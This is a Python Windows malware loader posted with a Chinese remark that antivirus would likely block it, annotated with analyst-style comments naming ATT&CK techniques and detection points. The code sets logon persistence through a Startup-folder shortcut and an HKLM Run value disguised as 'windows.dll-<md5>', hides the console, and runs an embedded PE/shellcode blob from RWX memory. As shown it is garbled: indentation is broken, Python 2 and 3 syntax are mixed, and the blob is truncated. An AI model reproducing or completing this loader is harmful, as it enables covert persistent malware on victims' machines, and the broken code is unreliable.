看样本，这个生成出来的应该会被防护软件拦截吧。

# -*- coding:utf-8 -*-
from ctypes import *

import ctypes
import re
import struct
import string
import binascii
import win32con
import win32api
import os
import sys
import pythoncom
import win32com.client as client
import hashlib
import time

def createShortCut(filename):  # No start-in directory is set on the created shortcut
"""Write a .lnk into the current user's Startup folder that points at ``filename``.

``filename`` should be an absolute path, or there will be some strange errors
(original author note; the function rebinds it below anyway).  Placing a link
in the per-user Start Menu Startup folder makes the target run at every logon,
i.e. user-level persistence (MITRE ATT&CK T1547.001).  Any exception is
printed and swallowed, so the caller never learns whether it worked.

Defender note: a .lnk appearing in the per-user Startup folder, written by a
python.exe / script-host process, is a high-signal event for detection rules.
"""
try:
    # Current user's Startup folder.  The literal is not a raw string; '\A',
    # '\R', '\M', '\W', '\S', '\P' are not valid escapes so they survive
    # verbatim (newer Pythons only warn), and the trailing '\\' is one backslash.
    working_directory = os.getenv(
        'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
    # Absolute path of the .lnk that will be created.
    lnkname = working_directory + filename + '.lnk'
    # Rebinds the parameter: the link target becomes a file of the same name
    # that sits next to the running script (resolved via sys.argv[0]).
    filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
    # WScript.Shell COM object -- the same API legitimate installers use, so
    # the distinguishing signal is the destination folder, not the call itself.
    shortcut = client.Dispatch("WScript.Shell").CreateShortCut(lnkname)
    shortcut.TargetPath = filename
    shortcut.save()
    print('配置开机自启') # Configure auto start
    # Broad catch: missing USERPROFILE, COM failure or access denied are all
    # printed and otherwise ignored -- no return value signals failure.
    except Exception as e:
    print(e.args)

   def set_shortcut(filename):  # iconname can be dropped if no special icon is needed
"""Write a Startup-folder .lnk whose target is the running script itself.

Unlike ``createShortCut`` this goes through the IShellLink / IPersistFile COM
interfaces directly, uses ``sys.argv[0]`` verbatim as the target and sets the
Startup folder as the start-in directory.  Returns True on success and False
on any exception (printed, not re-raised).  This is the variant ``main``
actually calls.

Defender note: the on-disk artifact is a .lnk in the user's Startup folder
named "windows.dll-<md5>.lnk" (see ``main``) pointing at a script under a
user-writable path; the HKLM Run value written by ``addfile2autorun`` shares
the same name, which makes the two artifacts easy to correlate.
"""
print(filename)
try:
    # Lazy import; if the shell COM wrappers are missing this raises and the
    # except branch below returns False.  ``shellcon`` is imported but unused.
    from win32com.shell import shell
    from win32com.shell import shellcon
    # Empty icon location -> the target's own icon is used.
    iconname = ""
    # Per-user Startup folder (non-raw string; the uppercase '\X' sequences
    # are not escapes and survive literally).
    working_directory = os.getenv(
        'USERPROFILE') + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\'
    # Full path of the .lnk to write.
    lnkname = working_directory + filename + '.lnk'
    print(lnkname)    
    # The sibling-file target used by createShortCut is disabled here; the
    # target is the running script instead (SetPath below).
    #filename = os.path.dirname(os.path.realpath(sys.argv[0])) + '\\' + filename
    shortcut = pythoncom.CoCreateInstance(
        shell.CLSID_ShellLink, None,
        pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink)
    #shortcut.SetPath(filename)
    # Target = the script path exactly as invoked (no realpath/abspath).
    shortcut.SetPath(sys.argv[0])
    # Start-in directory, so auxiliary files next to the target can be found.
    shortcut.SetWorkingDirectory(working_directory)
    # Optional; with "" the file's default icon is shown.
    shortcut.SetIconLocation(iconname, 0)
    # lnkname was built with '.lnk' above, so this guard never fires here.
    if os.path.splitext(lnkname)[-1] != '.lnk':
        lnkname += ".lnk"
    # Persist the link to disk through IPersistFile (second argument 0).
    shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(lnkname, 0)

    return True
except Exception as e:
    print(e.args)
    return False

  def addfile2autorun(name):
  """Register ``sys.argv[0]`` as value ``name`` under the machine-wide Run key.

  Opens HKEY_LOCAL_MACHINE at the ``runpath`` below with KEY_SET_VALUE, which
  normally requires administrative rights; on any failure (including access
  denied) the exception is silently discarded and nothing is returned, so the
  caller cannot tell whether the value was written.  Second persistence path
  used by ``main`` next to the Startup-folder link (MITRE ATT&CK T1547.001).

  Defender note: the artifact is a REG_SZ Run value named "windows.dll-"
  followed by 32 hex characters whose data is a script path, under the
  machine-wide Run key.
  """
  try:
    # Non-raw string: '\M', '\W', '\C' and '\R' are not escapes, so the key
    # path is preserved as written.
    runpath = "Software\Microsoft\Windows\CurrentVersion\Run"
    # HKLM (all users), opened for writing only.
    hKey = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, runpath, 0, win32con.KEY_SET_VALUE)
    # Value data is the script path exactly as invoked (may be relative).
    win32api.RegSetValueEx(hKey, name, 0, win32con.REG_SZ, sys.argv[0])
    win32api.RegCloseKey(hKey)
  # Silent swallow: no return value, no log -- failures are invisible.
  except Exception as e:
  pass
 def executable_code(buffer):
"""Copy ``buffer`` into a freshly allocated page and mark it RWX (POSIX variant).

Dead code in this listing: it needs a module-level ``libc`` (the
``CDLL('libc.so.6')`` line in ``main`` is commented out) and the ``PROT_*``
constants that are only assigned inside ``main``, and nothing shown here calls
it.  The Windows path in ``main`` (VirtualAlloc / VirtualProtect) is what
actually runs.  Left untouched for analysis of the author's Linux variant.
"""
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
# NOTE(review): once wrapped in c_void_p this comparison is always False -- a
# ctypes pointer object does not compare equal to the int 0 -- so a NULL
# return from valloc would not be caught here.
if 0 == addr: 
    raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
# mprotect to read+write+execute: a W^X violation that hardened kernels and
# host-based monitoring commonly log or deny.
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
    raise Exception("Failed to set protection on buffer")
return addr

def main():
"""Entry point: plant persistence, hide the console, run the embedded blob in-process.

Sequence as written below:
  1. Assemble ``buf``: it starts with an MZ header, contains the
     "This program cannot be run in DOS mode." stub text, a "Rich" marker and
     a "PE" signature -- i.e. a PE image.  The paste stops a few dozen bytes
     into the optional header, so as shown the image is truncated and cannot
     run; treat the bytes as a header fragment for analysis only.
  2. Derive "windows.dll-<md5 of buf>" and plant both a Startup-folder .lnk
     (``set_shortcut``) and a machine-wide Run value (``addfile2autorun``).
  3. Hide the console window.
  4. Allocate an RWX region with VirtualAlloc, copy the blob in with
     RtlMoveMemory, cast it to a function pointer and call it.
  5. Sleep forever so the process stays resident.

The file mixes Python 2 and 3 syntax: ``print "..." * 666`` below is a
Python 2 statement and a SyntaxError on Python 3, so the module as pasted
only compiles under Python 2.

Defender notes: from a python.exe process, a PAGE_EXECUTE_READWRITE
VirtualAlloc followed by a memory copy and an indirect call through that
region is the canonical in-memory loader pattern that RWX-allocation and
memory-scanning rules target; the Startup .lnk and the Run value are the
durable disk/registry indicators, and both carry the same md5-derived name.
"""

buf =  b""
# "MZ" (0x4d 0x5a).  The bytes that follow look like x86 code (an e8 call
# then pop ebx) rather than a conventional DOS stub -- a layout seen in
# PE/shellcode polyglots; confirm by disassembly before relying on it.
buf += b"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5"
buf += b"\x81\xc3\x93\x45\x00\x00\xff\xd3\x81\xc3\x66\x62\x02"
buf += b"\x00\x53\x6a\x04\x50\xff\xd0\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e"
buf += b"\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
# ASCII "This program cannot be run in DOS mode." -- standard stub text.
buf += b"\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20"
buf += b"\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e"
buf += b"\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e"
buf += b"\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x49\x9c"
buf += b"\x6e\x3a\x0d\xfd\x00\x69\x0d\xfd\x00\x69\x0d\xfd\x00"
buf += b"\x69\x4b\xac\xe1\x69\x29\xfd\x00\x69\x4b\xac\xdf\x69"
buf += b"\x1a\xfd\x00\x69\x4b\xac\xe0\x69\x8e\xfd\x00\x69\x0d"
buf += b"\xfd\x01\x69\xce\xfd\x00\x69\x04\x85\x93\x69\x1c\xfd"
buf += b"\x00\x69\x04\x85\x83\x69\x0c\xfd\x00\x69\x00\xaf\xe0"
buf += b"\x69\x17\xfd\x00\x69\x00\xaf\xdc\x69\x0c\xfd\x00\x69"
# "Rich" marker of the toolchain header.
buf += b"\x00\xaf\xde\x69\x0c\xfd\x00\x69\x52\x69\x63\x68\x0d"
buf += b"\xfd\x00\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# "PE\0\0" signature, then the COFF header: machine 0x014c (i386),
# 4 sections, a timestamp, ...
buf += b"\x00\x50\x45\x00\x00\x4c\x01\x04\x00\x3c\x97\x52\x5f"
# ... SizeOfOptionalHeader 0xe0 and Characteristics 0x2102 (if read
# correctly: executable, 32-bit, DLL -- verify with a PE parser); the
# optional header begins with magic 0x010b (PE32) and is cut off below.
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x21\x0b"
buf += b"\x01\x0c\x00\x00\xf6\x01\x00\x00\xe6\x00\x00\x00\x00"
buf += b"\x00\x00\xaa\x38\x01\x00\x00\x10\x00\x00\x00\x10\x02"


# Name suffix for both persistence artifacts: hex MD5 of the blob.
bufmd5 = get_md5_value(buf)  
set_shortcut("windows.dll-" + bufmd5)
addfile2autorun("windows.dll-" + bufmd5)

# Linux variant disabled; ``executable_code`` above depends on this name.
#libc = CDLL('libc.so.6')

# POSIX mprotect flags, only referenced by the unused ``executable_code``.
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4

# Local aliases; the VirtualAlloc alias is not used -- the fully qualified
# call is made below instead.
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
# Hide the console so nothing is visible to the user; GetConsoleWindow
# returns 0 when the process has no console.
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       # Tautological guard (same literal on both sides): always true.
       if 6669999999999999999999999999999999999==6669999999999999999999999999999999999:
              # ShowWindow(..., 0) == SW_HIDE.
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              # An HWND is not a kernel object handle, so this CloseHandle
              # presumably just fails; its result is ignored either way.
              ctypes.windll.kernel32.CloseHandle(whnd)
# Python 2 print statement (SyntaxError on Python 3); emits filler output.
print ".................................."*666
# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX
# allocation sized to the blob -- the primary detection point of this loader.
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# ctypes char-array view over the bytearray (shares the buffer, no copy).
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
# Redundant: the region was already allocated with 0x40; set again anyway.
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
# Copy the blob into the executable region.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
# Treat the region as a C function and call it; control transfers to the
# code at the MZ header.  (This ``shell`` is unrelated to the COM ``shell``
# module imported inside set_shortcut.)
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
# Process cannot exit: keep the interpreter alive after the call returns.
while True:
    time.sleep(1)

def get_md5_value(src):
    """Return the hexadecimal MD5 digest of ``src`` (bytes).

    Only used to derive a deterministic name suffix for the persistence
    artifacts in ``main``; no integrity or security property is relied on.
    """
    return hashlib.md5(src).hexdigest()

# Runs main() only when the file is executed directly, not on import.
if __name__ == '__main__':
main()
